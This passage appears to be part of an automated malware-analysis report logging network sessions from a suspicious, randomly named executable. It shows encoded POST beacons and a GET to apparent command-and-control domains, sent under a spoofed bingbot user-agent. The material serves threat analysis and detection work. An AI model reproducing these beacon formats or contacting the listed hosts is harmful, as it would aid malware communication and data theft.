                            Sep 26, 2024 15:24:40.978209972 CEST1236INData Raw: 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 69 66 28 76 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 64 2b 2b 29 2c 6f 3c 3d 28 73 3d 76 2d 34 38 3c 31 30 3f 76 2d 32 32 3a 76 2d 36 35 3c 32 36 3f 76 2d 36
                            Data Ascii: ror("punycode_bad_input(1)");if(v=e.charCodeAt(d++),o<=(s=v-48<10?v-22:v-65<26?v-65:v-97<26?v-97:o))throw RangeError("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-
                            Sep 26, 2024 15:24:40.978218079 CEST640INData Raw: 29 29 3b 67 2b 3d 6f 29 79 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 28 73 2b 28 70 2d 73 29 25 28 6f 2d 73 29 2c 30 29 29 29 2c 70 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 70 2d 73 29 2f 28 6f 2d 73 29 29 3b
                            Data Ascii: ));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.le


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.749714161.97.168.245806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:24:54.241308928 CEST626OUTPOST /za6x/ HTTP/1.1
                            Host: www.disn-china.buzz
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.disn-china.buzz
                            Content-Length: 215
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.disn-china.buzz/za6x/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 4a 69 6f 45 78 79 77 2b 4a 73 4c 33 74 31 6c 75 5a 62 7a 6b 57 4f 48 78 42 77 6f 36 2f 78 71 2f 34 61 31 41 6f 4a 74 74 53 2f 36 56 64 42 32 49 33 66 2f 73 4b 66 55 51 78 79 62 46 33 41 4b 68 49 5a 76 6a 7a 42 6f 33 50 46 79 57 47 34 6e 4f 75 76 49 37 7a 43 4e 76 33 64 75 43 36 55 55 63 64 36 6a 57 38 7a 57 35 6c 2f 56 71 65 63 78 62 48 74 2b 61 33 2b 6d 63 79 2f 73 55 7a 53 55 59 30 33 35 45 6d 30 31 66 56 31 79 70 63 5a 4a 62 5a 4b 55 54 44 43 2f 55 4f 74 53 39 52 63 70 44 72 78 42 72 62 5a 4f 61 52 31 4d 75 38 62 4b 33 69 4a 79 79 32 41 55 63 33 32 33 4a 6f 41 64 41 33 45 4a 5a 44 75 6a 33 6e 2b 52 2f 54 55 38 6c 76 51 3d 3d
                            Data Ascii: Z0=JioExyw+JsL3t1luZbzkWOHxBwo6/xq/4a1AoJttS/6VdB2I3f/sKfUQxybF3AKhIZvjzBo3PFyWG4nOuvI7zCNv3duC6UUcd6jW8zW5l/VqecxbHt+a3+mcy/sUzSUY035Em01fV1ypcZJbZKUTDC/UOtS9RcpDrxBrbZOaR1Mu8bK3iJyy2AUc323JoAdA3EJZDuj3n+R/TU8lvQ==
                            Sep 26, 2024 15:24:54.893639088 CEST1236INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:24:54 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
                            ETag: W/"66cd104a-b96"
                            Content-Encoding: gzip
                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                            Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                            Sep 26, 2024 15:24:54.893779039 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.749715161.97.168.245806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:24:56.783531904 CEST646OUTPOST /za6x/ HTTP/1.1
                            Host: www.disn-china.buzz
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.disn-china.buzz
                            Content-Length: 235
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.disn-china.buzz/za6x/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 4a 69 6f 45 78 79 77 2b 4a 73 4c 33 73 55 31 75 62 36 7a 6b 42 2b 48 79 4e 51 6f 36 70 42 71 42 34 61 78 41 6f 4b 67 79 53 4d 65 56 64 6c 79 49 30 62 72 73 4a 66 55 51 70 43 62 41 70 77 4b 71 49 5a 53 41 7a 45 51 33 50 46 6d 57 47 35 58 4f 75 59 63 38 7a 53 4e 68 76 74 75 45 2b 55 55 63 64 36 6a 57 38 7a 53 66 6c 2f 4e 71 66 76 70 62 42 4a 71 64 37 65 6d 62 36 66 73 55 34 79 55 63 30 33 34 72 6d 32 51 43 56 33 4b 70 63 5a 35 62 59 65 41 51 49 43 2f 53 54 39 54 61 51 5a 59 74 6c 51 70 78 44 72 65 58 59 6d 59 62 39 74 58 56 34 72 2b 65 6f 52 73 6e 7a 30 54 2f 2f 6d 41 31 31 46 4e 42 4f 4d 58 57 34 4a 30 56 65 47 64 68 35 6c 46 79 41 76 68 35 74 66 69 49 68 6d 50 36 61 49 52 48 75 37 45 3d
                            Data Ascii: Z0=JioExyw+JsL3sU1ub6zkB+HyNQo6pBqB4axAoKgySMeVdlyI0brsJfUQpCbApwKqIZSAzEQ3PFmWG5XOuYc8zSNhvtuE+UUcd6jW8zSfl/NqfvpbBJqd7emb6fsU4yUc034rm2QCV3KpcZ5bYeAQIC/ST9TaQZYtlQpxDreXYmYb9tXV4r+eoRsnz0T//mA11FNBOMXW4J0VeGdh5lFyAvh5tfiIhmP6aIRHu7E=
                            Sep 26, 2024 15:24:57.387134075 CEST1236INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:24:57 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
                            ETag: W/"66cd104a-b96"
                            Content-Encoding: gzip
                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                            Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                            Sep 26, 2024 15:24:57.387217045 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.749716161.97.168.245806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:24:59.332489014 CEST1659OUTPOST /za6x/ HTTP/1.1
                            Host: www.disn-china.buzz
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.disn-china.buzz
                            Content-Length: 1247
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.disn-china.buzz/za6x/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 4a 69 6f 45 78 79 77 2b 4a 73 4c 33 73 55 31 75 62 36 7a 6b 42 2b 48 79 4e 51 6f 36 70 42 71 42 34 61 78 41 6f 4b 67 79 53 4d 57 56 65 51 6d 49 33 38 58 73 49 66 55 51 33 79 62 37 70 77 4b 4e 49 5a 36 63 7a 45 55 42 50 44 69 57 41 61 50 4f 71 64 77 38 38 53 4e 68 7a 64 75 46 36 55 56 45 64 2b 48 61 38 7a 43 66 6c 2f 4e 71 66 71 6c 62 57 4e 2b 64 39 65 6d 63 79 2f 73 51 7a 53 55 77 30 7a 74 63 6d 32 56 31 55 47 71 70 66 39 64 62 66 74 6f 51 4b 69 2f 51 53 39 54 43 51 5a 63 75 6c 51 31 62 44 71 72 41 59 6b 34 62 38 71 72 4c 72 6f 2b 48 38 6a 67 6a 37 69 50 68 36 6b 52 42 77 48 46 61 49 63 53 31 34 4c 45 4b 61 57 35 7a 31 31 55 2b 57 4f 39 30 30 71 2f 51 75 53 6d 57 48 72 78 54 74 4e 73 62 62 49 4d 4d 57 54 75 5a 63 68 52 47 41 34 4c 50 54 61 70 2f 4c 54 6f 68 64 7a 4e 54 4e 66 4a 37 4e 57 6a 6d 50 70 4d 47 67 54 47 53 46 6d 79 79 59 2f 6f 65 67 68 68 33 37 6a 6b 71 48 79 30 58 37 37 65 6a 78 64 62 64 47 75 6f 39 52 50 2f 4e 31 34 6c 72 54 51 69 58 2f 59 57 72 79 5a 41 77 51 74 57 57 76 70 34 [TRUNCATED]
                            Data Ascii: Z0=JioExyw+JsL3sU1ub6zkB+HyNQo6pBqB4axAoKgySMWVeQmI38XsIfUQ3yb7pwKNIZ6czEUBPDiWAaPOqdw88SNhzduF6UVEd+Ha8zCfl/NqfqlbWN+d9emcy/sQzSUw0ztcm2V1UGqpf9dbftoQKi/QS9TCQZculQ1bDqrAYk4b8qrLro+H8jgj7iPh6kRBwHFaIcS14LEKaW5z11U+WO900q/QuSmWHrxTtNsbbIMMWTuZchRGA4LPTap/LTohdzNTNfJ7NWjmPpMGgTGSFmyyY/oeghh37jkqHy0X77ejxdbdGuo9RP/N14lrTQiX/YWryZAwQtWWvp4BXhLh/N2umlYxJmpTLV0P/tuqmUyjqTpel/d8PSHGpcoDa7+vrBWRqHfMUb+4g6uI32PgK/ltH8n51wxCuZuYF02i5/JiZ0Q862Qfb4GfNDxjPXS+aNUpKg4HlqUF5JB5fwu9L9VFg8RqK8GCNeSwBmxNbX/0c/h5ydY9a9xdV7eKSdZvl86F0cXbqDALCfRjEr8p8eDKnVbWXopn3KN5nx8i4bkAGGYYXD9Hn9z5kN9xNuC3X6aXYPt4xiwGsknpLFamKiubhyxeNRiD+q7yhokdh8CBaJEX9rtMdlkFdQYKLKX6+O/KAZL7li5jfipnaxkR1l0QFUygPELXQ55FCM8HQCPc3C59JsI6eJlli0obD7jvAg4uuwOGEamXciCWXcdUebSzAIAf0wKXWKNBmrJE0WtQxu0koAnsQoSxuaBfqeLKJgEvhvESzH22KLNaBX4HVu5liWlAsbLr28PoTmMTkwpnUpP1R1iZj8BHZgilzGwKILarwFC3StQ1RyXXT4Rka2ByaBCyHdf+TxA2z26qcZfpwE2+sJGB73luaxSEM4pr2SAlgmRvqks+Xz/ZnKvMm5A9ZXxh+O48ih6scri5sKC0wthP1cJrywczmb525wcJbm946yeVRb6D1kxWVOQiD7yzxtZX2IOEj9PMAFdqUKU7CU+1G [TRUNCATED]
                            Sep 26, 2024 15:24:59.948558092 CEST1236INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:24:59 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
                            ETag: W/"66cd104a-b96"
                            Content-Encoding: gzip
                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                            Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                            Sep 26, 2024 15:24:59.948581934 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.749717161.97.168.245806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:25:01.880167007 CEST356OUTGET /za6x/?fRr0=tfAptZ&Z0=EgAkyEJNK52+6mt0ZZzaOaTRCjAqhTrWwvgRo5oIQtO9ZSuXgOHTRb0W4iTGk1GYFMCByhdBFH2COuTwpe8yjCAk5/Of1W40SqKn8hyiq9h4asN2CcaU88uOnsZx5gwZ1TVihW9sV3GM HTTP/1.1
                            Host: www.disn-china.buzz
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Sep 26, 2024 15:25:02.494323969 CEST1236INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:25:02 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 2966
                            Connection: close
                            Vary: Accept-Encoding
                            ETag: "66cd104a-b96"
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                            Sep 26, 2024 15:25:02.494355917 CEST1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                            Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                            Sep 26, 2024 15:25:02.494369984 CEST698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                            Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.749718208.91.197.27806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:25:08.586146116 CEST641OUTPOST /gekb/ HTTP/1.1
                            Host: www.kevin-torkelson.info
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.kevin-torkelson.info
                            Content-Length: 215
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.kevin-torkelson.info/gekb/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 30 78 65 44 37 39 54 4f 48 33 6d 67 68 6a 75 58 49 52 73 64 63 33 50 7a 62 57 58 2b 58 4c 76 62 76 47 6d 4d 72 38 58 4d 67 69 71 4d 4b 42 67 62 54 76 43 35 50 4f 66 51 66 57 38 41 58 4f 53 65 50 51 34 51 73 6b 61 52 76 52 53 61 49 5a 45 50 37 6d 65 5a 55 6c 6e 44 72 45 72 6d 6b 38 2b 6c 75 63 54 38 5a 72 33 2f 75 42 39 5a 2b 43 64 4f 79 75 38 6c 42 46 59 41 46 4c 6c 48 46 43 32 62 43 4d 6e 4e 35 73 30 49 54 79 70 50 6c 4d 56 48 76 55 62 79 31 4d 34 6e 48 68 50 30 5a 53 79 4f 46 36 50 72 72 43 4f 6f 62 37 53 43 68 74 48 51 53 46 6c 58 47 45 39 48 35 65 5a 61 63 4f 37 62 6e 43 37 57 53 38 76 4b 78 33 58 68 46 4e 56 50 79 41 3d 3d
                            Data Ascii: Z0=0xeD79TOH3mghjuXIRsdc3PzbWX+XLvbvGmMr8XMgiqMKBgbTvC5POfQfW8AXOSePQ4QskaRvRSaIZEP7meZUlnDrErmk8+lucT8Zr3/uB9Z+CdOyu8lBFYAFLlHFC2bCMnN5s0ITypPlMVHvUby1M4nHhP0ZSyOF6PrrCOob7SChtHQSFlXGE9H5eZacO7bnC7WS8vKx3XhFNVPyA==


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            14192.168.2.749719208.91.197.27806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:25:11.131480932 CEST661OUTPOST /gekb/ HTTP/1.1
                            Host: www.kevin-torkelson.info
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.kevin-torkelson.info
                            Content-Length: 235
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.kevin-torkelson.info/gekb/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
